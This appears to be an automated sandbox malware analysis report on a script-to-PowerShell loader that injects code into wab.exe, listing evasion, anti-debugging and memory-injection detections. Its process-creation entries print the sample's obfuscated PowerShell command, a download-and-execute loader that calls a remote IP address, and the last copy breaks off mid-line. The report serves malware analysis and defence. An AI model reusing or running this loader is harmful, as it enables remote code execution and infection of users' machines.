                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 600FA16
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5677Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4162Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6961Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2774Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5715Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3752Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.3 %
                Source: C:\Windows\System32\wscript.exe TID: 4320Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 6961 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 2774 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7868Thread sleep count: 243 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7868Thread sleep time: -121500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep count: 5715 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep time: -17145000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep count: 3752 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872Thread sleep time: -11256000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_227910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_227910F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv8
                Source: wab.exe, 00000009.00000002.2993796074.00000000065E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX/d
                Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: wscript.exe, 00000000.00000003.1717969194.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
                Source: wscript.exe, 00000000.00000003.1712586037.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721244381.0000027D86CE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713309532.0000027D86CC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717969194.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717760543.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713608480.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721362071.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713410944.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2394644445.0000026CEED94000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: wscript.exe, 00000000.00000003.1712586037.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717760543.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721362071.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}6b~
                Source: bhv5123.tmp.13.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_11-33819
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_026BD430 LdrInitializeThunk,4_2_026BD430
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22792639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_22792639
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22794AB4 mov eax, dword ptr fs:[00000030h]9_2_22794AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_2279724E GetProcessHeap,9_2_2279724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22792639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_22792639
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22792B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_22792B1C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_227960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_227960E2

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_5352.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F0FEF8Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela 